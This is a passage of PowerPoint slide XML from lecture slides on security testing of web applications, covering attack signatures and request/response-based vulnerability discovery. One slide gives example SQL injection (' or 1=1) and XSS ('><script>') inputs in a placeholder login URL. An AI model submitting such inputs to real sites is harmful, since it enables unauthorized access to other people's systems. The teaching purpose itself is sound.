            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>comparing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>program  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>states</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-12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outputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-10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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>known </a:t>
            </a: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malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-6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states</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia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outputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-8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under</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2000" spc="-11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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="20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692905" y="769111"/>
            <a:ext cx="292735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0" dirty="0"/>
              <a:t>Testing</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-60" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-5" dirty="0"/>
              <a:t>technique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45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1310894" y="1387856"/>
            <a:ext cx="2965450" cy="178117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259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="675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259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-8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Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>signature</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575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259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" strike="sngStrike" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mutation</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" strike="sngStrike" spc="-100" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" strike="sngStrike" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>analysis</a:t>
            </a:r>
            <a:endParaRPr sz="2400" strike="sngStrike" dirty="0">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575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259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Static</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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analysis</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="259079" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="575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259715" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15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randomization</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="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722623" y="626618"/>
            <a:ext cx="26904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35" dirty="0"/>
              <a:t>Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-30" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>signature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46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17702" y="1306321"/>
            <a:ext cx="8197215" cy="4643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10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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Widely </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>used </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>testing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web‐based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-36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programs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0BD0D9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="275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5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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some</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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parts</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-114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of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="4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normal</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="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inputs</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-12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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10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attack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signatures</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="5080" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2380"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="570"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Signatures</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-13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developed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-3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from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-125" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>experience</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-14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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-80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vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> reports</a:t>
            </a:r>
            <a:endParaRPr sz="22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225"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>E.g.,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="10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  <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http://www.xyz.com/login.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>john</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>&amp;pwd=secret</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="926465" lvl="2" indent="-246379">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="245"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68421"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SQLI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.xyz.com/login.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15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900" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp;pwd=</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="926465" marR="260350" lvl="2" indent="-246379">
              <a:lnSpc>
                <a:spcPts val="2050"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="490"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buSzPct val="68421"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="927100" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>:  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>http://www.xyz.com/login.php?name=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“&gt;&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1900" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>&amp;pwd=</a:t>
            </a:r>
            <a:endParaRPr sz="1900">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="009DD9"/>
              </a:buClr>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:endParaRPr sz="19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121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85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Two </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ways </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>traverse </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-31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pages</a:t>
            </a:r>
            <a:endParaRPr sz="24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280"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-175" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr sz="22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265"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CC0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>case</a:t>
            </a:r>
            <a:endParaRPr sz="2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097783" y="645668"/>
            <a:ext cx="386397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35" dirty="0"/>
              <a:t>Attack </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>signature</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15" dirty="0"/>
              <a:t>(cont.)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47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17702" y="1260602"/>
            <a:ext cx="8134350" cy="4991100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287020" marR="538480" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="96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0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Request </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>response‐based </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>method </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>(Huang </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2003,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-14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Kals  2006)</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="199390" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Requests</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-110" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>web</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-95" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pages, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF3300"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>nput</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-8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200" spc="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>fields</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-114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are</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="0" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>filled</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-7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with</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-9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attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-4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inputs,  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>submitted </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-225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websites</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" marR="841375" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="530"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Vulnerability presence </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>checked </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>confirming</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-38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known  response </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>messages </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>under</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-310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attacks</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="652780" lvl="1" indent="-247015">
              <a:lnSpc>
                <a:spcPts val="2375"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="0F6FC6"/>
              </a:buClr>
              <a:buSzPct val="84090"/>
              <a:buFont typeface="Wingdings 2"/>
              <a:buChar char=""/>
              <a:tabLst>
                <a:tab pos="652780" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="2200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Widely</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-110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used</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-40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to</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-120" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>discover</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-100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SQLI</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-50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and</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-6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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2200" spc="-60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vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
